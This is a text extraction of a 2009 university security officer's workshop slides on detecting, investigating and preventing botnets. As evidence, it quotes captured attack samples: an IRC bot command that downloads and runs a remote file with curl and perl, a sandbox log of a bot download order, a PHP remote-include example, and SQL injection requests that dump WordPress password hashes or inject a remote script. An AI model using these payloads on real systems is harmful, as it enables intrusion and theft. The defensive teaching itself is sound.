Botnet Phd (Piled Higher and Deeper) Craig A Schiller, CISSP-ISSMP,ISSAP Chief Information Security Officer Portland State University A Presentation About.

Botnet Phd (Piled Higher and Deeper)Botnet Phd (Piled Higher and Deeper)

Craig A Schiller, CISSP-ISSMP,ISSAP

Chief Information Security Officer

Portland State University

A Presentation About

Botnet DetectionFor

NWACC 09Security Workshop

by

© 2009 Craig A Schiller 2

AgendaAgenda

IntroductionDetectionForensics/Intel GatheringMalware AnalysisIncident ResponsePrevention


Primary SourcePrimary Source



AgendaAgenda



How Do We Detect How Do We Detect Them?Them? Computer is

ExploitedBecomes a Bot

New Bot Rallys to let Botherder

know it’s joined the team

Retrieve the Anti A/V module

Secure the New Bot Client

Retrieve the Payload module

Listen to the C&C Server/Peer for

commands

Execute the commands

Report Result to the C&C Channel

On Command, Erase all evidence and abandon the

client

A/V Detection

Other Bot Clients

C & C

Download server

C & C

Download serverC & C

Possible traffic to victim

User Browsing Malicious Sites


How Do We Detect How Do We Detect Them?Them? Computer is

ExploitedBecomes a Bot

New Bot Rallys to let Botherder

know it’s joined the team

Retrieve the Anti A/V module

Secure the New Bot Client

Retrieve the Payload module

Listen to the C&C Server/Peer for

commands

Execute the commands

Report Result to the C&C Channel

On Command, Erase all evidence and abandon the

client

A/V Detection

Other Bot Clients

C & C

Download server

C & C

Download serverC & C

Possible traffic to victim

User Browsing Malicious Sites

Known MalwareDistribution sites

Known C&C sites

Security & FW logs

Abuse@ notices

User Complaint

Anomalous Protocol Detection

Botlike TrafficBad Behavior

Talking to Darknet


I checked and I didn’t see anything

How Do We Detect How Do We Detect Them?Them?

A/V, Anti-Spam, Anti-SpywareHost basedEnterprise Reporting

User Help Desk TicketsAbuse notificationsQuasi-Intelligence OrganizationsMonitoring & Analysis

OurmonFirewall & Router logsIDS/IPS – Host and NetworkDNSServer & Workstation Log analysisMalware analysisForensics


OurmonOurmon

Free network security monitoring tool, with Botnet detection capabilities

http://ourmon.cat.pdx.edu/ourmon/index.html


Network Anomaly DetectionNetwork Anomaly Detection

Is it scanning? Is it participating in an IRC channel? Is there a high controls to data ratio? Is the IRC server/port listed as a known

Command & Control server? Does the IRC traffic text look botlike? Did the host lookup or attempt to

communicate with a known C&C server?

Did the host attempt to communicate with an IP address in the Darknet?



TCP workweight = syns sent + fins sent + resets returned/total TCP packets

ww =

measure of signal/noise (control/data) high number means all control (syn

scanner) basically means: an IP is scanning

Syn+Fin+Reset Total TCP



Ourmon does a similar calculation with IRC traffic

measure of signal/noise (control/data) high number means non-human

communication basically means: a bot or an

application (game)


Recent large ddos attackRecent large ddos attack

fundamental pkts graph looks like this normally:


Ouch, ouch, ouch! Ouch, ouch, ouch!

that’s 869k pps – we have physical gE connection to Inet …


““Botlike” IRC text Botlike” IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl mdbn.gif;rm -f *.gif*]


““Normal” IRC text Normal” IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 : OMG, you’re just my BFF Jill! I once had a BFF that was nowhere as good a BFF as you. <and other meaningless babble> ]


Snort signatures Snort signatures

No general purpose intrusion detection.

Limited set of Bot related signatures


Incident Detection examplesIncident Detection examples

1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka [**] [1:3111116:1] Mcafee http feed: :http://bluebookcarpices.com/ <http://pices.com/> (JS/Wonka) [**][Classification: access to a potentially vulnerable web application] [Priority: 2]05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80 TCP TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32 TCP Options (3) => NOP NOP TS: 345145726 2079777105

2. today, zlob, 131.252.243.80, pri=hi[**] [1:666666:1] zlob dns request [**][Classification: Potentially Bad Traffic] [Priority: 2]05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53 UDP TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73Len: 45


REN-ISACShadowserverNanogAPWG

Quasi-Intelligence Organizations

Mailing lists• Botnet• http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

• Phishing• http://www.whitestar.linuxbox.org/mailman/listinfo/

phishing

• Vendor

ISC Storm Center

http://www.emergingthreats.net/http://www.malwaredomainlist.com




Lists of Known C&C servers

http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP

IP Address Port Channel Country Region State Domain ASN AS Name AS Description

81.211.7.122 69.18.206.194 3267 #B#t[r2]N#t

RU US

MOSCOW | COMMACK

MOSKVANEW YORK

GLDN.NET INVISION.COM

3216 12251

SOVAM INVISION

AS Golden Telecom, Moscow, Russia Invision.com, Inc.

81.211.7.122 69.18.206.194 3267 #B#tN#t[r3]

RU US

MOSCOW | COMMACK

MOSKVA NEW YORK


3216 12251

SOVAM INVISION

AS Golden Telecom, Moscow, Russia Invision.com, Inc.

81.211.7.122 69.18.206.194 3267 #B�t[r2]N�t

RU US

MOSCOW | COMMACK

MOSKVANEW YORK


321612251

SOVAM INVISION

AS Golden Telecom, Moscow, Russia |Invision.com, Inc.

81.211.7.122 69.18.206.194 3267 #B.tN.t[r3]

RU US

MOSCOW | COMMACK

MOSKVA NEW YORK


3216 12251

SOVAM INVISION

AS Golden Telecom, Moscow, Russia |Invision.com, Inc.

213.234.193.74 85.21.82.55 6667 #secured

RU RU

MOSCOW | MOSCOW

MOSKVA MOSKVA NET.RU -

39442 8402

UNICO CORBINA

AS JSC UNICO AS Corbina Telecom

Shadow Server Sample



Supported by Indiana University and through relationship with EDUCAUSE and Internet2, the REN-ISAC is an integral part of higher education’s strategy to improve network security through information collection, analysis and dissemination, early warning, and response -- specifically designed to support the unique environment and needs of organizations connected to served higher education and research networks; and supports efforts to protect the national cyber infrastructure by participating in the formal U.S. ISAC structure.

The REN-ISAC receives, analyzes and acts on operational, threat, warning and actual attack information derived from network instrumentation and information sharing relationships. Instrumentation data include netflow, router ACL counters, darknet monitoring, and Global Network Operations Center operational monitoring systems. Information sharing relationships are established with other ISACs, DHS/US-CERT, private network security collaborations, network and security engineers on national R&E network backbones, and the REN-ISAC members.

REN-ISAC


Spamhaus Drop List

The Spamhaus Don't Route Or Peer List

DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and netblocks controlled entirely by professional spammers. DROP is a tiny sub-set of the SBL designed for use by firewalls and routing equipment.

DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not wish to route traffic for.

The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or 100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched away from their original owners (which in most cases are long dead corporations) and are now controlled by spammers or netblock thieves who resell the space to spammers.

When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from spamming, scanning, harvesting and dDoS attacks originating on rogue netblocks.

Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for information on use and implementation.


Spamhaus Drop List excerpt 9/17/09UkrTeleGroup

Nevacon

Sonic Colo-HK

Beijing HuaXingGuangWang

InfoVision Data Hosting Service


InfoMove Limited HK


85.255.112.0/20 SBL36702

194.146.204.0/22 SBL51152

110.44.0.0/20 SBL74731

116.199.128.0/19 SBL56563

117.103.40.0/21 SBL75246

119.27.128.0/19 SBL75245

119.42.144.0/21 SBL70035

120.143.128.0/21 SBL67396

121.46.64.0/18 SBL72673

128.199.0.0/16 SBL62478

132.232.0.0/16 SBL9176

132.240.0.0/16 SBL68517

134.33.0.0/16 SBL7097

138.252.0.0/16 SBL9702

138.43.0.0/16 SBL69354

139.167.0.0/16 SBL64740

143.49.0.0/16 SBL7182

150.230.0.0/16 SBL78129

152.147.0.0/16 SBL8847

167.28.0.0/16 SBL75680

167.97.0.0/16 SBL12947

168.151.0.0/16 SBL73292


Malware Domain List



DNS for Botnet DetectionDNS for Botnet Detection



DNS for Botnet DetectionDNS for Botnet Detection

http://www.enyo.de/fw/software/dnslogger/

http://www.enyo.de/fw/software/dnslogger/whois.html

DB of all lookups for Known C&CKnown Malicious SWDistros


knujon

10 Most Offensive Registrars

XIN NET (Second Time at #1) eNom

Network Solutions Register.com

PLANETONLINE RegTime

OnlineNIC SpotDomains (domainsite)

Wild West HICHINA Web Solutions


Search Engine Spam & Clicks 4 HireSearch Engine Spam & Clicks 4 Hire

site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien OR xanax OR paxil OR "slot-machine" OR "texas-holdem"

Use Google to search for Clicks-4-Hire relays and search engine spam


Google site search resultsGoogle site search results


An owned webpageAn owned webpage


Browser Intelligence gatheringBrowser Intelligence gathering


Links to this web pageLinks to this web page


Man in the Browser Attack - Man in the Browser Attack - torpigtorpig


AgendaAgenda



Forensics/Intel GatheringForensics/Intel Gathering

• Quick Forensics• Log Analysis• Process Explorer• TCPView• AutoRuns• Process Monitor

• Rpier – First Responder Tool• Automated Forensics• Consistent information gathered regardless of who runs it

• Sleuthing • How did they get in?• What does it do?• What files are used?• When did what happen?

• Malware Analysis

• More Sleuthing



Log analysisLog analysis


Forensics/Intel Gathering exampleForensics/Intel Gathering example

Process PID CPU Description Company NameSystem Idle Process 0 93.36 Interrupts n/a 1.56 Hardware Interrupts DPCs n/a Deferred Procedure Calls System 4 0.39 smss.exe 508 Windows NT Session Manager Microsoft Corporation csrss.exe 620 Client Server Runtime Process Microsoft Corporation winlogon.exe 884 Windows NT Logon Application Microsoft Corporation services.exe 944 Services and Controller app Microsoft Corporation svchost.exe 1180 Generic Host Process for Win32 Services Microsoft Corporation wmiprvse.exe 3400 WMI Microsoft Corporation svchost.exe 1252 Generic Host Process for Win32 Services Microsoft Corporation svchost.exe 1312 Generic Host Process for PSXSS.EXE 896

Interix Subsystem Server Microsoft Corporationinit 2156 Interix Utility Microsoft Corporationinetd 2432 Interix Utility Microsoft Corporationiexplorer.exe 3560explorer.exe 8564 Windows Explorer Microsoft Corporation ccApp.exe 9208 Symantec User Session Symantec Corporation VPTray.exe 8636 Symantec AntiVirus Symantec Corporation VPC32.exe 9524 Symantec AntiVirus Symantec Corporation iexplorer.exe 6712 sqlmangr.exe 9904 SQL Server Service Manager Microsoft Corporation







Strings in the file iexplorer.exe

Strings in memory


Centralized LoggingCentralized Logging

NTSyslog

``

``

MySQLDataBase

Server

Internet Log Collection

Log Collection Analysis


Workstation Log AnalysisWorkstation Log Analysis

http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en

Log Parser


A/V Centralized Reporting

Blocked by port blocking rule

3/25/2008 12:56:26 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 202.57.184.145:6666




3/26/2008 3:37:41 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666






3/26/2008 10:54:53 AM C:\Program Files\DNA\btdna.exe Prevent mass mailing worms from sending mail 41.220.121.130:25

Use (examine) the central reporting feature of your antivirus server.



5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced) PSU\anyman C:\Program Files\Internet Explorer\iexplore.exe

C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\ MediaTubeCodec_ver1.556.0[1].exe

Common Standard Protection: Prevent common programs from running files from the Temp folder Action blocked : Execute

MediaTubeCodec is a fake codec that installs malware and tells you that your computer is infected so you will download a fake antivirus product.

This appeared in the logs before McAfee could detect this malware



User defined detection: SPYWARE (Potentially Unwanted Program)5/12/2008 9:01:50 AM No Action Taken (Delete failed) SYSTEM McShield.exeC:\Documents and Settings\anyman\Desktop\ctfmona.exe

5/12/2008 9:02:31 AM User defined detection : No Action Taken (Clean failed because the detection isn't cleanable) SYSTEM McShield.exeC:\Documents and Settings\anyman\Desktop\ctfmona.exe

What does quarantine or “No Action Taken” mean?


Detectable BehaviorDetectable Behavior

• Multi-homed DNS– FQDN maps to 3 or more IP addressesbotnet1.example.com pointing to 127.0.0.1botnet1.example.com pointing to 127.0.0.2botnet1.example.com pointing to 127.0.0.3botnet1.example.com pointing to 127.0.0.4botnet1.example.com pointing to 127.0.0.5botnet1.example.com pointing to 127.0.0.6

• Dynamic DNS used thru commercial site– Change IP addresses quickly

• Short DNS TTLs for clients– Remap DNS often, check at boot

• FastFlux DNS – Change IP addresses and/or DNS names quickly (for

spam < 5 minutes) and often


Hiding the C&C Server or Phishing WebsiteHiding the C&C Server or Phishing Website

The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.


Passive DNSPassive DNS

http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query

https://dnsparse.insec.auckland.ac.nz/dns/index.html

http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query

https://dnsparse.insec.auckland.ac.nz/dns/index.html


Fast Flux DNS exampleFast Flux DNS example


Internal Intelligence gatheringInternal Intelligence gathering

http://code.google.com/p/rapier/

Rapier

A First Responder Toolkit Developed by Steve Mancini, Intel


Rapier


Cymru is happy to announce the availability of various service options dedicated to mapping suspected malware hashes to our insight about positively identified malware. Now you can check if a particular piece of code is malware by querying against the extensive Team Cymru Malware Hash Registry.

Malware Hash RegistryMalware Hash Registry

http://www.team-cymru.org/Services/MHR/

$ whois -h hash.cymru.com e1112134b6dcc8bed54e0e34d8ac272795e73d74 RESPONSEe1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53

$ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT RESPONSE"1221154281 53"

Using DNS (dig)

Using whois Unix Time -seconds since midnight 1970-01-01

% A/V Package Detection Rate



Alternate C&C MethodsAlternate C&C MethodsEcho-Based BotnetsEcho-based means the bot would simply announce its existence to the C&C.There are several ways of doing this with different volumes of data relayed.

•Connect & forget•File data•URL data

Command-Based Botnets• Web GUI based

•Push rather than pull•P2P•IM•Social Networking (My Space profiles)•Remote Administration Tools

•Dameware•CarbonCopy•Terminal Services•PC Anywhere•RDP

•Drop zone – ftp is the leading protocol here•ftp – phishing C&C - regularly reports back (echoes) to an FTP C&C,


Incident ResponseIncident Response

Required by OUS Information Security policy

PSU Information Security policy requires an Incident Response plan

PSU has several means of discovering incidents


AgendaAgenda



Carsten Willem’s CWSandboxCarsten Willem’s CWSandbox

VMWare

XP Pro

Ubuntu



Malware analysisMalware analysisCWSandbox

- <scanner name="AntiVir Workstation" application_version="2.1.9-20" signature_file_version="6.37.0.90"> <classification>WORM/Rbot.219136.17</classification> <additional_info /> </scanner>

- <connections_outgoing>- <connection transportprotocol="TCP" remoteaddr=“192.168.209.5" remoteport="13601" protocol="IRC" connectionestablished="1" socket="448">- <irc_data username="|00||-X-||4245" password="bong" nick="|00||-X-||4245"> <channel name="#sym" topic_deleted=":.download http://wooop.mooo.com/buz/120.exe c:\120.exe 1" /> <privmsg_deleted value=":|00||-X-||[email protected] PRIVMSG #sym :_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12 120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_ Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec." /> </irc_data> </connection>

http://www.spamhaus.org/faq/answers.lasso?section=Online%20Scams

http://www.spamhaus.org/faq/answers.lasso?section=Generic%20Questions#Slide%20127

http://www.cs.pdx.edu/~jrb


Analyzing the MalwareAnalyzing the Malware

CWSandbox Analysis


The FutureThe Future

Honeypots


AgendaAgenda



Responding to DetectionResponding to Detection

Botnet SensorsBotnet Sensors

Security Researcher

Internet

Wormwatch mailing list

131.252.x.x NERO says bad

131.252.x.x Acting Bad

131.252.x.x talking to bad

38.100.x.x McAfee says bad

Network Team User Support Server SupportTAGs

Create Tracking Ticket

Block Network access

Identify location

Identify computer or user


Retrieve computer

Backup all files

Perform quick forensics

Re-image computer

Identify ServIer or webpage owner

Identify compromised account

Locate malware

Determine attack vector

Security Team

Locate infected system

Identify system owner

Re-image computer


Review quick forensics

Perform deep forensics

Ensure appropriate resources are working the incident

Identify useful intelligence markers

McAfeeServer

User Reports


AgendaAgenda



Blocking Organized Crime supportersBlocking Organized Crime supporters

If your ISP doesn't already block them, you can add known criminals to your firewall rules or to your DNS dump tables.

Use the Spamhaus Drop list to block known evil sites

Intercage, Inhoster, and Nevacon:85.255.112.0/20 #SBL36702(85.255.112.0 - 85.255.127.255)69.50.160.0/19(69.50.160.0 - 69.50.191.255)194.146.204.0/22 #SBL51152(194.146.204.0 - 194.146.207.255)

Blog that track the RBN activities

http://rbnexploit.blogspot.com/


How do they get into User systems?How do they get into User systems?

Guessing weak passwords/phishing attacksExploiting Network vulnerabilitiesUsing Social EngineeringUsing web-based Trojans

Trojan websites – Game cheatsTrojan websites - Pornography

Using Email-based TrojansPhishing & PharmingTrojan downloads

Using IM-based Trojans (Social engineering)Rogue dhcp server serving malicious DNS server


How do they get into Servers? php includesHow do they get into Servers? php includes

Target.com

Webhost.com

1. Get /a.php?vuln=http://webhost.com/evil.php

2. Target makes request to wehost.com/evil.php

3. Malware PHP file ‘evil.php’ is sent to Target.comAnd is executed by the include() function.

4. The Output from evil.php is sent to Attacker

<?php include($vuln); ?>

Attacker


How do they get into Servers? – SQL How do they get into Servers? – SQL InjectionInjection

--c295b75d-A--[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3 45819 192.168.22.155 80--c295b75d-B--GET /shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)Host: www.somwhere-in.pdx.eduConnection: close--c295b75d-H--


mod-secmod-sec

Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]Stopwatch: 1212486727810932 339469 (2354 3333 -)Producer: ModSecurity v2.1.5 (Apache 2.x)Server: Apache/2.2.8 (OpenPKG/CURRENT)--c295b75d-Z--


Obfu73ca74ionObfu73ca74ion

page=-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A

-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*


PicturesPictures

phpBB photo galleries that permit users to post their own pictures

Webhost.com

1. Evil user post a executable file with a .gif extension (notapic.gif)

2. Evil user browses to the executable gif

Attacker

3. Webhost executes notapic.gif as web page owner


Other meansOther means

Profiles of user accounts (Social Networking sites)

Comment sections that don’t require the user to authenticate

BB’s that permit users to create their own accounts without an administrator

User web pages

Departmental web pages

Traditional network vulnerability attacks


Protect Your EnterpriseProtect Your Enterprise

AVOIDANCE

1. Establish a perimeter and segregate valuable or dangerous network segments. Make FW rules accountable and require change control

PREVENT

1. Ensure that all enterprise and local accounts have strong passwords. Configure Domain security policy to enforce this and auto-lockout

2. Eliminate all generic accounts. Where possible make all non-user accounts services.

3. Eliminate or encapsulate all unencrypted authentication

4. Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of mod-sec for apache websites)

5. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts

6. Block outbound port 25 traffic except from your official mail servers

7. Block outbound DNS requests except for iterative requests made through the official DNS servers (prevents spray and pray attacks)


Protect Your EnterpriseProtect Your EnterpriseDETECT

1. Install and operate IDS/IPS systems (snort, etc)

2. Analyze network traffic for heuristic evidence of botlike behavior

3. Google your own site - site:mysite.com viagra site:mysite.com c99

4. Centralize and process logs, including workstation security and firewall logs.

5. Mine your anti-virus quarantines, abuse notifications, infected systems for intelligence about botnet infections. Feed this information to your event correlation system

6. Participate or join quasi-intelligence organizations

MITIGATE

1. Use intelligence data in your DNS server to block access to C&C sites and malware distribution sites.

2. Use your centralized logs to detect and react to password guessing schemes in near-realtime.

3. Report detections to an incident reponse team that will quarantine compromised systems, determine physical location, and direct IT staff to retrieve the system, extract first responder data and intelligence, re-image the system than return it to the system owner along with a report on the successful attack vector.

4. Include known malware distribution sites in your proxy server block lists

5. Establish a spearphishing hotline for quick response.


Protect Your EnterpriseProtect Your Enterprise

REDUCE THE THREAT

1. Report new threats. Phishing attacks to Anti-Phishing Working Group. Botnet clients/C&C to isotf.org.

2. Feed the Bot related DNS attempts to your event correlation system

3. Add SiteAdvisor or IE7 anti-phishing feature to browsers

REDUCE THE VULNERABILITY

1. Actively scan your site for vulnerabilities (OS, network, web apps, etc)

NON-REALTIME ANALYSIS, DETECTION, and RECOVERY

1. Analyze data collected to identify new intelligence markers.

2. Evaluate new signatures, new tools, etc.

3. Use non-realtime data to develop strategies for ranking confidence related to available data and intelligence.

4. Use Forensic techniques and sandbox technology to gather intelligence from known compromised workstations.


RBNRBN


RBN OperationsRBN Operations

11/21/07 Ref: Bizeul.org -

SPB IX

DELTASYS

DATAPOINT

INFOBOX

RBN

SILVERNETCREDOLINK

OINVEST


RBN USA Dead?RBN USA Dead?

It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.


RBN USA Dead?RBN USA Dead?


What Happened?What Happened?

http://www.betanews.com/article/UnitedLayer_COO_Giving_access_to_InterCage_is_an_issue_of_ethics/1222396858

Company after company dropped relations with InterCage in the wake of multiple reports documenting its shady dealings,

Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave Donaldson's people the power to send InterCage dark or, as he chose to do, stick InterCage in a sandbox.

By Angela Gunn, BetaNews September 25, 2008, 10:40 PM


McColoMcColo

It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.


Effect of De-peeringEffect of De-peering

50% Drop in Spam


Who’s Next?Who’s Next?In the wake of the demise of Atrivo/Intercage and McColo, attention has focused on other badware nets these entities formerly hosted.

EstDomains, Esthost, Hostfresh, Cernel,

EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly once acted as the IP registrar for RBN domains. Malicious Web site hosting nasties like CoolWebSearch and other spyware programs trace back to EstDomains. Tsastsin has links to organized crime and also heads up Rove Digital, a site also suspected of hosting malware servers.

Anti-spam group Spamhaus called EstDomain, Esthost, Cernel, and Hostfresh, the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August 2008 as backed by "gangs of cybercriminals" whose disappearance from the Web would be difficult to achieve, but would result in a safer Internet.


AgendaAgenda

•Botnet Overview•Botnet Schemes•How Do They Get In?•What Can We Do?•Concluding Thoughts


Source of all evilSource of all evil


Q&AQ&A

Questions?

Craig A Schiller, CISSP-ISSMP, [email protected]

Portland State UniversityCISO

Botnet Phd (Piled Higher and Deeper) Craig A Schiller, CISSP-ISSMP,ISSAP Chief Information Security Officer Portland State University A Presentation About.

Documents

darknet slide

schiller4 slide

inet slide

deeper craig

total tcp slide

av detection

application game slide

irc traffic text